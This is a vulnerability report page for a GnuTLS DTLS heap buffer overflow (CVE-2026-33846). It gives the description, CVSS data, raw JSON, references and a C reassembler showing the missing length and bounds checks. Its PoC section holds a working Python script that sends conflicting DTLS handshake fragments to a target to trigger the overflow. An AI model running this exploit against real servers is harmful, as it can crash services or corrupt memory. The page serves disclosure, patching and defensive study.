Security Vulnerability Report
CVE-2026-33846 CVSS 7.5 HIGH

CVE-2026-33846

Published: 2026-05-04 10:16:00
Last Modified: 2026-05-04 15:22:53

Description

A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption.
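The two checks the description says merge_handshake_packet() lacks are easy to state in code. The following C reassembler is an added illustration written for this report, not GnuTLS source and not the upstream fix: it parses the 12-byte DTLS handshake fragment header, sizes the buffer from the first fragment's message_length, and then rejects any later fragment whose message_length disagrees or whose fragment_offset + fragment_length would land outside that buffer. It constructs inline the same two fragments the PoC below sends (message_length 10, then 1010 with a 1000-byte payload at offset 10) and shows the second being refused before any memcpy. Struct names, return codes and the in-order, non-overlapping fragment assumption are this example's own.

```c
/* Added example, not GnuTLS code: a minimal DTLS handshake fragment reassembler that
 * enforces message_length consistency and buffer bounds on merge. Names are illustrative. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HS_HDR_LEN 12 /* type(1) length(3) message_seq(2) frag_offset(3) frag_length(3) */

struct hs_fragment {
    uint8_t msg_type; uint16_t msg_seq;
    uint32_t msg_len, frag_off, frag_len;
    const uint8_t *data;
};

struct hs_message {
    uint8_t msg_type; uint16_t msg_seq;
    uint32_t msg_len;  /* size of buf, fixed by the first fragment seen */
    uint32_t received; /* bytes copied so far (assumes in-order, non-overlapping fragments) */
    uint8_t *buf;
};

static uint32_t be24(const uint8_t *p) { return ((uint32_t)p[0] << 16) | ((uint32_t)p[1] << 8) | p[2]; }
static void put24(uint8_t *p, uint32_t v) { p[0] = (uint8_t)(v >> 16); p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)v; }

/* Parse one handshake fragment header; -1 if the header or payload is truncated. */
int parse_hs_fragment(const uint8_t *pkt, size_t pkt_len, struct hs_fragment *f)
{
    if (pkt_len < HS_HDR_LEN) return -1;
    f->msg_type = pkt[0];
    f->msg_len = be24(pkt + 1);
    f->msg_seq = (uint16_t)((pkt[4] << 8) | pkt[5]);
    f->frag_off = be24(pkt + 6);
    f->frag_len = be24(pkt + 9);
    if (pkt_len - HS_HDR_LEN < f->frag_len) return -1; /* frag_length exceeds what arrived */
    f->data = pkt + HS_HDR_LEN;
    return 0;
}

/* Merge one fragment into msg: 0 = stored, 1 = message complete, -1 = rejected. */
int merge_fragment(struct hs_message *msg, const struct hs_fragment *f)
{
    if (msg->buf == NULL) {
        /* First fragment: its message_length decides the allocation. */
        msg->msg_type = f->msg_type;
        msg->msg_seq = f->msg_seq;
        msg->msg_len = f->msg_len;
        msg->received = 0;
        msg->buf = malloc(f->msg_len ? f->msg_len : 1);
        if (msg->buf == NULL) return -1;
    } else if (msg->msg_type != f->msg_type || msg->msg_seq != f->msg_seq) {
        return -1; /* different logical message: handshake type alone is not a sufficient key */
    }
    /* Check 1: every fragment of a message must carry the same message_length. */
    if (f->msg_len != msg->msg_len) return -1;
    /* Check 2: offset + length must fit the buffer, phrased so the sum cannot wrap. */
    if (f->frag_off > msg->msg_len || f->frag_len > msg->msg_len - f->frag_off) return -1;
    memcpy(msg->buf + f->frag_off, f->data, f->frag_len);
    msg->received += f->frag_len;
    return msg->received >= msg->msg_len ? 1 : 0;
}

/* Serialise a fragment header plus a constant-fill payload; returns bytes written. */
size_t build_hs_fragment(uint8_t *out, uint8_t type, uint32_t msg_len, uint16_t seq,
                         uint32_t off, uint32_t len, uint8_t fill)
{
    out[0] = type;
    put24(out + 1, msg_len);
    out[4] = (uint8_t)(seq >> 8); out[5] = (uint8_t)seq;
    put24(out + 6, off);
    put24(out + 9, len);
    memset(out + HS_HDR_LEN, fill, len);
    return HS_HDR_LEN + len;
}

/* Feed a 10-byte ClientHello fragment (message_length len1) followed by a second fragment
 * (message_length len2, offset off2, length flen2 <= 1024) through parse + merge.
 * Returns the second merge's result, or -2 if a fragment failed to parse. */
int reassemble_pair(uint32_t len1, uint32_t len2, uint32_t off2, uint32_t flen2)
{
    static uint8_t pkt1[HS_HDR_LEN + 64], pkt2[HS_HDR_LEN + 1024];
    struct hs_fragment f;
    struct hs_message msg = {0};
    size_t n1 = build_hs_fragment(pkt1, 1, len1, 0, 0, 10, 'A');      /* constructed input */
    size_t n2 = build_hs_fragment(pkt2, 1, len2, 0, off2, flen2, 'B'); /* constructed input */
    int r;
    if (parse_hs_fragment(pkt1, n1, &f) != 0) return -2;
    r = merge_fragment(&msg, &f);
    if (r >= 0 && parse_hs_fragment(pkt2, n2, &f) != 0) r = -2;
    else if (r >= 0) r = merge_fragment(&msg, &f);
    free(msg.buf);
    return r;
}

/* The PoC's pair: message_length 10, then 1010 with a 1000-byte payload at offset 10. */
int demo_conflicting_lengths(void) { return reassemble_pair(10, 1010, 10, 1000); }
/* Consistent counterpart: two 10-byte halves of a 20-byte message. */
int demo_consistent_lengths(void) { return reassemble_pair(20, 20, 10, 10); }

int main(void)
{
    printf("PoC fragments:   %d (expect -1, rejected)\n", demo_conflicting_lengths());
    printf("consistent pair: %d (expect 1, complete)\n", demo_consistent_lengths());
    return 0;
}
```

Check 2 is written as two comparisons against the allocated size rather than as `frag_off + frag_len <= msg_len`, because the 24-bit fields are widened into uint32_t and an attacker-chosen offset near 2^24 could otherwise be combined with a length that makes the sum wrap; the same shape applies whichever integer width a real implementation uses.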

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

GnuTLS (for the exact affected versions, see the vendor security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import struct

# Target configuration
TARGET_IP = "192.168.1.100"
TARGET_PORT = 4433


def create_dtls_record(content_type, version, epoch, sequence, fragment):
    """Helper to create a DTLS record layer header"""
    # Format: ContentType(1) + Version(2) + Epoch(2) + Sequence(6) + Length(2)
    # Note: Length is the length of the fragment
    header = struct.pack("!BHH", content_type, version, epoch)
    header += struct.pack("!Q", sequence)[2:]  # Take last 6 bytes for sequence
    header += struct.pack("!H", len(fragment))
    return header + fragment


def create_handshake_fragment(msg_type, msg_len, msg_seq, frag_offset, frag_len, data):
    """Helper to create a Handshake protocol fragment"""
    # Format: Type(1) + Length(3) + MessageSeq(2) + FragmentOffset(3) + FragmentLength(3)
    header = struct.pack("!B", msg_type)
    header += struct.pack("!I", msg_len)[1:]  # 24-bit length
    header += struct.pack("!H", msg_seq)
    header += struct.pack("!I", frag_offset)[1:]  # 24-bit offset
    header += struct.pack("!I", frag_len)[1:]  # 24-bit fragment length
    return header + data


# Exploit logic
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    # 1. Send initial fragment with small message_length (e.g., 10 bytes)
    # This tricks the allocator into reserving a small buffer.
    small_data = b"A" * 10
    frag1 = create_handshake_fragment(
        msg_type=1,  # ClientHello
        msg_len=10,  # The declared total message length (small)
        msg_seq=0,
        frag_offset=0,
        frag_len=10,
        data=small_data,
    )
    # Content type 22 = handshake, version 0xfefd = DTLS 1.2, epoch 0, record sequence 0
    record1 = create_dtls_record(22, 0xfefd, 0, 0, frag1)
    sock.sendto(record1, (TARGET_IP, TARGET_PORT))
    print("[+] Sent Fragment 1 (Small allocation trigger)")

    # 2. Send subsequent fragment with inconsistent larger length
    # The implementation trusts the initial allocation but writes based on this large data.
    large_data = b"B" * 1000
    frag2 = create_handshake_fragment(
        msg_type=1,  # ClientHello (same type to match)
        msg_len=1010,  # Conflicting larger total length
        msg_seq=0,
        frag_offset=10,
        frag_len=1000,
        data=large_data,
    )
    # The record sequence number advances to 1: a repeated record sequence number
    # would be discarded by DTLS anti-replay checks before reaching reassembly.
    record2 = create_dtls_record(22, 0xfefd, 0, 1, frag2)
    sock.sendto(record2, (TARGET_IP, TARGET_PORT))
    print("[+] Sent Fragment 2 (Heap overflow trigger)")
    print("[+] Exploit packets sent successfully.")
except Exception as e:
    print(f"[-] Error: {e}")
finally:
    sock.close()

References

https://access.redhat.com/errata/RHSA-2026:13274
https://access.redhat.com/security/cve/CVE-2026-33846
https://bugzilla.redhat.com/show_bug.cgi?id=2450625

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33846",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-04T10:15:59.690",
    "lastModified": "2026-05-04T15:22:52.850",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-130"}
        ]
      }
    ],
    "references": [
      {"url": "https://access.redhat.com/errata/RHSA-2026:13274", "source": "[email protected]"},
      {"url": "https://access.redhat.com/security/cve/CVE-2026-33846", "source": "[email protected]"},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450625", "source": "[email protected]"}
    ]
  }
}